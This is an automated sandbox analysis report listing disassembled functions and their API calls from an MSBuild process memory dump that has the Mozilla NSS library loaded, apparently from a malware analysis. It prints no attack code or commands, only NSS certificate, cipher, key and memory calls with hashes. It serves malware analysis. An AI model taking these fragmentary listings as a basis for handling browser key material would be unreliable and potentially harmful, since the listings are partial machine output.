Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: UtilValue$CriticalEnterSectionUnlock$AlgorithmAlloc_Arena_DecodeDigestErrorFreeInfoTag_freemalloc
String ID:
API String ID: 2025608128-0
Opcode ID: 64d0704cec67cd8d051b58c025d9b057a1d917d7bc717ee02cadfa5477b38b7b
Instruction ID: a64ce8daee65bec12166ac03881e3f727dba286bde16c85ab3a7d0a07ce16128
Opcode Fuzzy Hash: 64d0704cec67cd8d051b58c025d9b057a1d917d7bc717ee02cadfa5477b38b7b
Instruction Fuzzy Hash: 68316FB5A012599BDB11DFA8D881AEE77F4EF49248F540068EC19EB701E731E904CBA2

Function 6CB72E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6CB62D1A), ref: 6CB72E7E

Part of subcall function 6CBC07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CB68298,?,?,?,6CB5FCE5,?), ref: 6CBC07BF
Part of subcall function 6CBC07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CBC07E6
Part of subcall function 6CBC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC081B
Part of subcall function 6CBC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBC0825

PR_Now.NSS3 ref: 6CB72EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6CB72EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6CB62D1A), ref: 6CB72F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6CB62D1A), ref: 6CB72F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CB72F81

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: 2874eb0b0ed787a154fae606580a43a4727861bdfa863f8ca0984ecaa8c72d85
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: 8C31B2715011C0C6EF34C656DC98BBEB266EB81318F64456AD8399BAD0EB319886C733

Function 6CB60E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6CB60A2C), ref: 6CB60E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6CB60A2C), ref: 6CB60E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6CB60A2C), ref: 6CB60E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6CB60A2C), ref: 6CB60E90
free.MOZGLUE(00000000), ref: 6CB60EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6CB60A2C), ref: 6CB60ED9

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 7e88b17977b076d3b367dd63847f82950226c33ba468ce4c0b937dbc4f5e1d6b
Instruction ID: a59106563c3ec5167f15b96d2dd926c0da76213c32b377b8d87c5984bc352200
Opcode Fuzzy Hash: 7e88b17977b076d3b367dd63847f82950226c33ba468ce4c0b937dbc4f5e1d6b
Instruction Fuzzy Hash: 25212973E412E45BEB104967FC85B6B76AEEBC1748F190035D81C67E42EA61C81482A7

Function 6CB6AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CB6AEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6CB6AECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB6AEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6CB6AF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6CC89500), ref: 6CB6AF23

Part of subcall function 6CBBF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6CBBF0C8
Part of subcall function 6CBBF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CBBF122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB6AF37

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: 44c88ba1c6eef573a7f371afea51a56fb7fffb860efcc83a165fd3a831eaf8d5
Instruction ID: fb2897b83b6c5833d9fda289cf956050cbacc4f9ea179e534be6d04ad253311d
Opcode Fuzzy Hash: 44c88ba1c6eef573a7f371afea51a56fb7fffb860efcc83a165fd3a831eaf8d5
Instruction Fuzzy Hash: 1E2128B59052509BEF108F19DC01B9A7BA4EF8572CF144318FC14ABB91F731D5058BA7

Function 6CBEEE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CBEEE85
realloc.MOZGLUE(C7299DC0,?), ref: 6CBEEEAE
PORT_Alloc_Util.NSS3(?), ref: 6CBEEEC5

Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15

htonl.WSOCK32(?), ref: 6CBEEEE3
htonl.WSOCK32(00000000,?), ref: 6CBEEEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6CBEEF01

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: 00b34b2012fb36b956bc3b97384f051b4e4d33cf9850ce3fb3ea8bfee40eb233
Instruction ID: 60bf350f724c583bc061b47d3d35b29aab809d7576f3d17beaf37a2fd0bebd53
Opcode Fuzzy Hash: 00b34b2012fb36b956bc3b97384f051b4e4d33cf9850ce3fb3ea8bfee40eb233
Instruction Fuzzy Hash: 0521E571A002549FDF109F28DC80B9EB7A4EF49798F158169EC199B741E330EC14CBE6

Function 6CB9EE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB9EE49

Part of subcall function 6CBBFAB0: free.MOZGLUE(?,-00000001,?,?,6CB5F673,00000000,00000000), ref: 6CBBFAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CB9EE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6CB9EE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6CB9EE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CB9EEB3

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: 62b7c2ccd7394df782251d5d03c3b8884f60b0905bac737b02fbd94f9268acd4
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: 942196BAA006906BEB119A58DC81EAF77A8EB46718F044174FD049B752EA71DC1487F1

Function 6CBC2550 Relevance: 9.1, APIs: 6, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 6CBC2576
PORT_Alloc_Util.NSS3(00000000), ref: 6CBC2585

Part of subcall function 6CBC0BE0: malloc.MOZGLUE(6CBB8D2D,?,00000000,?), ref: 6CBC0BF8
Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 6CBC25A1
_waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 6CBC25AF
free.MOZGLUE(00000000), ref: 6CBC25BB
free.MOZGLUE(00000000), ref: 6CBC25CA

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: ByteCharMultiWidefree$Alloc_UtilValue_waccessmalloc
String ID:
API String ID: 3520324648-0
Opcode ID: fb3b202ce9ce1f7257fe634c611d6da0cf8674776e091278663039f3b3743764
Instruction ID: 683821b84d0b4dceb565ef4932348df9aac021672d60f234ff4c90bc7ebf5f87
Opcode Fuzzy Hash: fb3b202ce9ce1f7257fe634c611d6da0cf8674776e091278663039f3b3743764
Instruction Fuzzy Hash: E401B1B17052417BFF102BB9DC19E3B366DEB416A5F140130BD1AD6681E9A0DD5086F7

Function 6CB4C4E0 Relevance: 9.1, APIs: 6, Instructions: 52COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CB4C4F0
free.MOZGLUE ref: 6CB4C51A
TlsSetValue.KERNEL32 ref: 6CB4C540
free.MOZGLUE ref: 6CB4C557
DeleteCriticalSection.KERNEL32 ref: 6CB4C56A
free.MOZGLUE ref: 6CB4C576

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: free$Value$CriticalDeleteSection
String ID:
API String ID: 195087141-0
Opcode ID: a3cbb7607578cef3a488e832c3b6a2fcbbe696bbe153d90269d9dc7d38277521
Instruction ID: c121a098c3adfd608296e3edc14bbc57f16a23085ccaa2d67f8064fe330da2ed
Opcode Fuzzy Hash: a3cbb7607578cef3a488e832c3b6a2fcbbe696bbe153d90269d9dc7d38277521
Instruction Fuzzy Hash: 35112B74A08B418BCB10BF79C04916EBFF4FF55749F054A2DD8CA87A00EB74A498CB96

Function 6CB6E520 Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(00000000,?,?,6CB77F5D,00000000,00000000,?,?,?,6CB780DD), ref: 6CB6E532

Part of subcall function 6CC29090: TlsGetValue.KERNEL32 ref: 6CC290AB
Part of subcall function 6CC29090: TlsGetValue.KERNEL32 ref: 6CC290C9
Part of subcall function 6CC29090: EnterCriticalSection.KERNEL32 ref: 6CC290E5
Part of subcall function 6CC29090: TlsGetValue.KERNEL32 ref: 6CC29116
Part of subcall function 6CC29090: LeaveCriticalSection.KERNEL32 ref: 6CC2913F

PR_EnterMonitor.NSS3(6CB780DD), ref: 6CB6E549

Part of subcall function 6CC29090: LeaveCriticalSection.KERNEL32 ref: 6CC291AA
Part of subcall function 6CC29090: TlsGetValue.KERNEL32 ref: 6CC29212
Part of subcall function 6CC29090: _PR_MD_WAIT_CV.NSS3 ref: 6CC2926B

PR_ExitMonitor.NSS3 ref: 6CB6E56D
PL_HashTableDestroy.NSS3 ref: 6CB6E57B

Part of subcall function 6CB6E190: PR_EnterMonitor.NSS3(?,?,6CB6E175), ref: 6CB6E19C
Part of subcall function 6CB6E190: PR_EnterMonitor.NSS3(6CB6E175), ref: 6CB6E1AA
Part of subcall function 6CB6E190: PR_ExitMonitor.NSS3 ref: 6CB6E208
Part of subcall function 6CB6E190: PL_HashTableRemove.NSS3(?), ref: 6CB6E219
Part of subcall function 6CB6E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB6E231
Part of subcall function 6CB6E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB6E249
Part of subcall function 6CB6E190: PR_ExitMonitor.NSS3 ref: 6CB6E257

PR_ExitMonitor.NSS3(6CB780DD), ref: 6CB6E5B5
PR_DestroyMonitor.NSS3 ref: 6CB6E5C3

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Monitor$Enter$ExitValue$CriticalSection$Arena_DestroyFreeHashLeaveTableUtil$Remove
String ID:
API String ID: 3740585915-0
Opcode ID: 9fdf9c9afa4c1899d1d150a47b3d3ef19f5b1429c6ecb941bd541805befea2e5
Instruction ID: 005701136c1832d0f0d205be98d1046c1e194b3f3399a37f824171631f0a4bf6
Opcode Fuzzy Hash: 9fdf9c9afa4c1899d1d150a47b3d3ef19f5b1429c6ecb941bd541805befea2e5
Instruction Fuzzy Hash: 300140F1E205D0DBEF019F29DC01A593BB4F70674DF001136D40581A61FB715B59EB8A

Function 6CB4AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB4AFDA

Strings

unable to delete/modify collation sequence due to active statements, xrefs: 6CB4AF5C
misuse, xrefs: 6CB4AFCE
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB4AFC4
%s at line %d of [%.10s], xrefs: 6CB4AFD3

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 6607723419554659fea742b61c0b822c221ddab24012cead214277cc6cf84345
Instruction ID: 6b9947fe3a362f5ec132c616b0923cf7c2947f89dbda101c18f3464325d60719
Opcode Fuzzy Hash: 6607723419554659fea742b61c0b822c221ddab24012cead214277cc6cf84345
Instruction Fuzzy Hash: 73910175A082958FDB04CF29C890AAEB7F1FF45314F1980A8E864AB795D330EC02DF61

Function 6CAEE4C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108D2,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CAEE53A
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108BD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CAEE5BC

Strings

database corruption, xrefs: 6CAEE52F, 6CAEE5B1
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CAEE525, 6CAEE596, 6CAEE5A7
%s at line %d of [%.10s], xrefs: 6CAEE534, 6CAEE5B6

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 1ce43ecbb98bc7fc2c74c0a3d48e19bb5f23a4466c03aa6615c31a05449e36ae
Instruction ID: 80c10e09af6cc262b4bad71ca74e3102c6f03c08793b3b5655e42a34fddb4764
Opcode Fuzzy Hash: 1ce43ecbb98bc7fc2c74c0a3d48e19bb5f23a4466c03aa6615c31a05449e36ae
Instruction Fuzzy Hash: 32314930A407159FC321CE9DC89097BB7A0EB49714F580D7DE848A7B85F365E985D3E0

Function 6CB50DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CB50BDE), ref: 6CB50DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6CB50BDE), ref: 6CB50DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CB50BDE), ref: 6CB50DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CB50BDE), ref: 6CB50E32

Strings

%s incr => %d (find lib), xrefs: 6CB50E2D

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 310f2df5f6d5405008a8bfe7186f6db2bdcf88f505071da12943d1d26dc4f9fd
Instruction ID: 42f6d18707646c96a49b8fc1fe60fa57cf471119c57991d02877ef9d3a1f179f
Opcode Fuzzy Hash: 310f2df5f6d5405008a8bfe7186f6db2bdcf88f505071da12943d1d26dc4f9fd
Instruction Fuzzy Hash: F2012472B002549FE7209F24AC45E1773BCDB45A0DB54442EE909D3A41F762EC24C7E1

Function 6CBAC590 Relevance: 7.7, APIs: 5, Instructions: 155COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6CBAC5C7
PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6CBAC603
PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6CBAC636
PK11_FreeSymKey.NSS3(?), ref: 6CBAC6D7
PK11_FreeSymKey.NSS3(?), ref: 6CBAC6E1

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: K11_$DoesMechanism$Free
String ID:
API String ID: 3860933388-0
Opcode ID: 4e3c15f0e77527252abab32050ec62f74d850352120b916d60d737ba577012a4
Instruction ID: 449d1c9ef8e23f4c71cbb04e0ccfcf11823a8ae82f3b1cf2019979816e68b6fc
Opcode Fuzzy Hash: 4e3c15f0e77527252abab32050ec62f74d850352120b916d60d737ba577012a4
Instruction Fuzzy Hash: F94174B560525AAFDB01DFA9DC81DAB77A9EF08348B440038FD94D7720E732D916CBA1

Function 6CBF2460 Relevance: 7.6, APIs: 5, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,6CC97379,00000002,?), ref: 6CBF2493
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CBF24B4
PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,6CC97379,00000002,?), ref: 6CBF24EA
PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,6CC97379,00000002,?), ref: 6CBF24F5
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,6CC97379,00000002,?), ref: 6CBF24FE

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Error$Alloc_FreeK11_Utilfree
String ID:
API String ID: 2595244113-0
Opcode ID: e39636d30b34f93752e0d9ea0ffc45df092fa2a0d8cba494b446a6997dbb264a
Instruction ID: f0a1e14ec15ca581cc51f3a00a52f7657978e7b98073b89a151bdff66866eb0e
Opcode Fuzzy Hash: e39636d30b34f93752e0d9ea0ffc45df092fa2a0d8cba494b446a6997dbb264a
Instruction Fuzzy Hash: D031D2B1A00196ABEB008FA4DC45BBB77A4EF48308F104125FE6597780E775D95AC7A3
